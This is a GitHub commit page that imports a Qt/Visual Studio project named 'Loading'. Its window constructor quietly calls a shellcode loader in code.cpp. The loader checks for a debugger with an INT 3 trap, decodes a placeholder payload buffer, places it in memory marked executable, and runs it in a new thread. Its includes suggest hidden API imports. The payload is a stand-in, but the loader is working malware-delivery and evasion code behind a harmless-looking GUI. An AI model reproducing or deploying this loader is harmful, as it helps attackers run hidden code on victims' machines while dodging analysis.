Skip to content

Commit 9e565ae

Browse files
author
GitHub
committed
import
0 parents  commit 9e565ae

20 files changed

+2155
-0
lines changed

.gitignore

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
2+
# Visual Studio
3+
.vs/
4+
.vscode/
5+
6+
# Build output
7+
bin/
8+
obj/
9+
10+
# Temporary files
11+
*.tmp
12+
*.log
13+
*.user

Loading/Loading.sln

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
2+
Microsoft Visual Studio Solution File, Format Version 12.00
3+
# Visual Studio Version 17
4+
VisualStudioVersion = 17.14.36414.22 d17.14
5+
MinimumVisualStudioVersion = 10.0.40219.1
6+
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading\Loading.vcxproj", "{66EDDBB0-8404-470E-B6AF-F08E3028FC49}"
7+
EndProject
8+
Global
9+
GlobalSection(SolutionConfigurationPlatforms) = preSolution
10+
Debug|x64 = Debug|x64
11+
Debug|x86 = Debug|x86
12+
Release|x64 = Release|x64
13+
Release|x86 = Release|x86
14+
EndGlobalSection
15+
GlobalSection(ProjectConfigurationPlatforms) = postSolution
16+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x64.ActiveCfg = Debug|x64
17+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x64.Build.0 = Debug|x64
18+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x86.ActiveCfg = Debug|Win32
19+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Debug|x86.Build.0 = Debug|Win32
20+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x64.ActiveCfg = Release|x64
21+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x64.Build.0 = Release|x64
22+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x86.ActiveCfg = Release|Win32
23+
{66EDDBB0-8404-470E-B6AF-F08E3028FC49}.Release|x86.Build.0 = Release|Win32
24+
EndGlobalSection
25+
GlobalSection(SolutionProperties) = preSolution
26+
HideSolutionNode = FALSE
27+
EndGlobalSection
28+
GlobalSection(ExtensibilityGlobals) = postSolution
29+
SolutionGuid = {81588261-228D-4F54-B041-3D117CAB2B5D}
30+
EndGlobalSection
31+
EndGlobal

Loading/Loading/Loading.cpp

Lines changed: 12 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
#include "Loading.h"
2+
#include "code.h"
3+
4+
Loading::Loading(QWidget *parent)
5+
: QMainWindow(parent)
6+
{
7+
ui.setupUi(this);
8+
start();
9+
}
10+
11+
Loading::~Loading()
12+
{}

Loading/Loading/Loading.h

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
#pragma once
2+
3+
#include <QtWidgets/QMainWindow>
4+
#include "ui_Loading.h"
5+
6+
class Loading : public QMainWindow
7+
{
8+
Q_OBJECT
9+
10+
public:
11+
Loading(QWidget *parent = nullptr);
12+
~Loading();
13+
14+
private:
15+
Ui::LoadingClass ui;
16+
};

Loading/Loading/Loading.vcxproj

Lines changed: 141 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,141 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup Label="ProjectConfigurations">
4+
<ProjectConfiguration Include="Debug|Win32">
5+
<Configuration>Debug</Configuration>
6+
<Platform>Win32</Platform>
7+
</ProjectConfiguration>
8+
<ProjectConfiguration Include="Release|Win32">
9+
<Configuration>Release</Configuration>
10+
<Platform>Win32</Platform>
11+
</ProjectConfiguration>
12+
<ProjectConfiguration Include="Debug|x64">
13+
<Configuration>Debug</Configuration>
14+
<Platform>x64</Platform>
15+
</ProjectConfiguration>
16+
<ProjectConfiguration Include="Release|x64">
17+
<Configuration>Release</Configuration>
18+
<Platform>x64</Platform>
19+
</ProjectConfiguration>
20+
</ItemGroup>
21+
<PropertyGroup Label="Globals">
22+
<VCProjectVersion>17.0</VCProjectVersion>
23+
<Keyword>Win32Proj</Keyword>
24+
<ProjectGuid>{66eddbb0-8404-470e-b6af-f08e3028fc49}</ProjectGuid>
25+
<RootNamespace>Loading</RootNamespace>
26+
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
27+
</PropertyGroup>
28+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
29+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
30+
<ConfigurationType>Application</ConfigurationType>
31+
<UseDebugLibraries>true</UseDebugLibraries>
32+
<PlatformToolset>v143</PlatformToolset>
33+
<CharacterSet>Unicode</CharacterSet>
34+
</PropertyGroup>
35+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
36+
<ConfigurationType>Application</ConfigurationType>
37+
<UseDebugLibraries>false</UseDebugLibraries>
38+
<PlatformToolset>v143</PlatformToolset>
39+
<WholeProgramOptimization>true</WholeProgramOptimization>
40+
<CharacterSet>Unicode</CharacterSet>
41+
</PropertyGroup>
42+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
43+
<ConfigurationType>Application</ConfigurationType>
44+
<UseDebugLibraries>true</UseDebugLibraries>
45+
<PlatformToolset>v143</PlatformToolset>
46+
<CharacterSet>Unicode</CharacterSet>
47+
</PropertyGroup>
48+
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
49+
<ConfigurationType>Application</ConfigurationType>
50+
<UseDebugLibraries>false</UseDebugLibraries>
51+
<PlatformToolset>v143</PlatformToolset>
52+
<WholeProgramOptimization>true</WholeProgramOptimization>
53+
<CharacterSet>Unicode</CharacterSet>
54+
</PropertyGroup>
55+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
56+
<ImportGroup Label="ExtensionSettings">
57+
</ImportGroup>
58+
<ImportGroup Label="Shared">
59+
</ImportGroup>
60+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
61+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
62+
</ImportGroup>
63+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
64+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
65+
</ImportGroup>
66+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
67+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
68+
</ImportGroup>
69+
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
70+
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
71+
</ImportGroup>
72+
<PropertyGroup Label="UserMacros" />
73+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
74+
<ClCompile>
75+
<WarningLevel>Level3</WarningLevel>
76+
<SDLCheck>true</SDLCheck>
77+
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
78+
<ConformanceMode>true</ConformanceMode>
79+
</ClCompile>
80+
<Link>
81+
<SubSystem>Console</SubSystem>
82+
<GenerateDebugInformation>true</GenerateDebugInformation>
83+
</Link>
84+
</ItemDefinitionGroup>
85+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
86+
<ClCompile>
87+
<WarningLevel>Level3</WarningLevel>
88+
<FunctionLevelLinking>true</FunctionLevelLinking>
89+
<IntrinsicFunctions>true</IntrinsicFunctions>
90+
<SDLCheck>true</SDLCheck>
91+
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
92+
<ConformanceMode>true</ConformanceMode>
93+
</ClCompile>
94+
<Link>
95+
<SubSystem>Console</SubSystem>
96+
<GenerateDebugInformation>true</GenerateDebugInformation>
97+
</Link>
98+
</ItemDefinitionGroup>
99+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
100+
<ClCompile>
101+
<WarningLevel>Level3</WarningLevel>
102+
<SDLCheck>true</SDLCheck>
103+
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104+
<ConformanceMode>true</ConformanceMode>
105+
</ClCompile>
106+
<Link>
107+
<SubSystem>Console</SubSystem>
108+
<GenerateDebugInformation>true</GenerateDebugInformation>
109+
</Link>
110+
</ItemDefinitionGroup>
111+
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
112+
<ClCompile>
113+
<WarningLevel>Level3</WarningLevel>
114+
<FunctionLevelLinking>true</FunctionLevelLinking>
115+
<IntrinsicFunctions>true</IntrinsicFunctions>
116+
<SDLCheck>true</SDLCheck>
117+
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118+
<ConformanceMode>true</ConformanceMode>
119+
</ClCompile>
120+
<Link>
121+
<SubSystem>Console</SubSystem>
122+
<GenerateDebugInformation>true</GenerateDebugInformation>
123+
</Link>
124+
</ItemDefinitionGroup>
125+
<ItemGroup>
126+
<ClCompile Include="code.cpp" />
127+
<ClCompile Include="Loading.cpp" />
128+
<ClCompile Include="main.cpp" />
129+
<ClCompile Include="moc\moc_Loading.cpp" />
130+
<ClCompile Include="rcc\qrc_Loading.cpp" />
131+
</ItemGroup>
132+
<ItemGroup>
133+
<ClInclude Include="code.h" />
134+
<ClInclude Include="lazy_importer.hpp" />
135+
<ClInclude Include="Loading.h" />
136+
<ClInclude Include="uic\ui_Loading.h" />
137+
</ItemGroup>
138+
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
139+
<ImportGroup Label="ExtensionTargets">
140+
</ImportGroup>
141+
</Project>
Lines changed: 48 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
<?xml version="1.0" encoding="utf-8"?>
2+
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3+
<ItemGroup>
4+
<Filter Include="Source Files">
5+
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
6+
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
7+
</Filter>
8+
<Filter Include="Header Files">
9+
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10+
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11+
</Filter>
12+
<Filter Include="Resource Files">
13+
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14+
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15+
</Filter>
16+
</ItemGroup>
17+
<ItemGroup>
18+
<ClCompile Include="code.cpp">
19+
<Filter>Source Files</Filter>
20+
</ClCompile>
21+
<ClCompile Include="Loading.cpp">
22+
<Filter>Source Files</Filter>
23+
</ClCompile>
24+
<ClCompile Include="main.cpp">
25+
<Filter>Source Files</Filter>
26+
</ClCompile>
27+
<ClCompile Include="rcc\qrc_Loading.cpp">
28+
<Filter>Source Files</Filter>
29+
</ClCompile>
30+
<ClCompile Include="moc\moc_Loading.cpp">
31+
<Filter>Source Files</Filter>
32+
</ClCompile>
33+
</ItemGroup>
34+
<ItemGroup>
35+
<ClInclude Include="code.h">
36+
<Filter>Header Files</Filter>
37+
</ClInclude>
38+
<ClInclude Include="lazy_importer.hpp">
39+
<Filter>Header Files</Filter>
40+
</ClInclude>
41+
<ClInclude Include="Loading.h">
42+
<Filter>Header Files</Filter>
43+
</ClInclude>
44+
<ClInclude Include="uic\ui_Loading.h">
45+
<Filter>Header Files</Filter>
46+
</ClInclude>
47+
</ItemGroup>
48+
</Project>

Loading/Loading/code.cpp

Lines changed: 109 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,109 @@
1+
#include "code.h"
2+
#include "lazy_importer.hpp"
3+
#include "winuser.h"
4+
#include <string>
5+
#include <cstring>
6+
#include <ostream>
7+
#include <stdlib.h>
8+
#include <stdio.h>
9+
10+
11+
char* c16memcpy(char* s1, const char* s2, size_t n) {
12+
return static_cast<char*>(memcpy(s1, s2, n * sizeof(char)));
13+
}
14+
void* MMcpy(void* dst, const void* src, size_t len)
15+
{
16+
char* ch_dst = (char*)dst;
17+
char* ch_src = (char*)src;
18+
if (NULL == ch_dst || NULL == ch_src) {
19+
return NULL;
20+
}
21+
22+
void* rest = ch_dst;
23+
24+
if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) {
25+
while (len--) {
26+
*(char*)ch_dst = *(char*)ch_src;
27+
ch_dst = (char*)ch_dst + 1;
28+
ch_src = (char*)ch_src + 1;
29+
}
30+
}
31+
else {
32+
ch_src = (char*)ch_src + len - 1;
33+
ch_dst = (char*)ch_dst + len - 1;
34+
while (len--) {
35+
*(char*)ch_dst = *(char*)ch_src;
36+
ch_dst = (char*)ch_dst - 1;
37+
ch_src = (char*)ch_src - 1;
38+
}
39+
}
40+
return rest;
41+
}
42+
43+
bool Tesbuer()
44+
{
45+
__try
46+
{
47+
__asm //x86 implementation
48+
{
49+
_emit 0xCD
50+
_emit 0x03 //INT 03
51+
_emit 0xC3 //RET
52+
}
53+
}
54+
__except (EXCEPTION_EXECUTE_HANDLER)
55+
{
56+
return false;
57+
}
58+
59+
return true;
60+
}
61+
62+
int Testms()
63+
{
64+
char* garbage = (char*)malloc(10);
65+
for (int i = 0; i < 10; i++)
66+
{
67+
garbage[i] = rand() % 256;
68+
}
69+
return 0;
70+
}
71+
72+
int start()
73+
{
74+
if (Tesbuer())
75+
{
76+
Testms();
77+
return 0;
78+
}
79+
else {
80+
DWORD dwThreadId;
81+
// 线程ID
82+
//HANDLE hThread;
83+
// 线程句柄
84+
DWORD dwOldProtect;
85+
//char shellcode[DATA_SIZE] = { 0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41,0X41 };
86+
char shellcode[DATA_SIZE] = "AAAAAAAAAAAAAAAAAAAAAA";
87+
DWORD size = ((PDWORD)shellcode)[0];//size
88+
HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
89+
char* tmpptr = shellcode + sizeof(DWORD);
90+
91+
char* llm_ppVoid1 = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
92+
93+
for (int i = 0; i < size; i++)
94+
{
95+
tmpptr[i] = (tmpptr[i] - 1) ^ (i + 1);
96+
//printf("0x%02x,", scode1[i]);
97+
}
98+
c16memcpy((char*)llm_ppVoid1, (const char*)tmpptr, size);
99+
Testms();
100+
VirtualProtect(llm_ppVoid1, size, PAGE_EXECUTE, &dwOldProtect);
101+
WaitForSingleObject(CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)llm_ppVoid1, NULL, NULL, &dwThreadId), INFINITE);
102+
// 一直等待线程执行结束
103+
while (1)
104+
{
105+
Sleep(12000);
106+
}
107+
//return 0;
108+
}
109+
}

Loading/Loading/code.h

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
2+
#include <windows.h>
3+
#define DATA_SIZE 27136
4+
5+
6+
int start();
7+
8+
void run(void* buffer);

0 commit comments

Comments
 (0)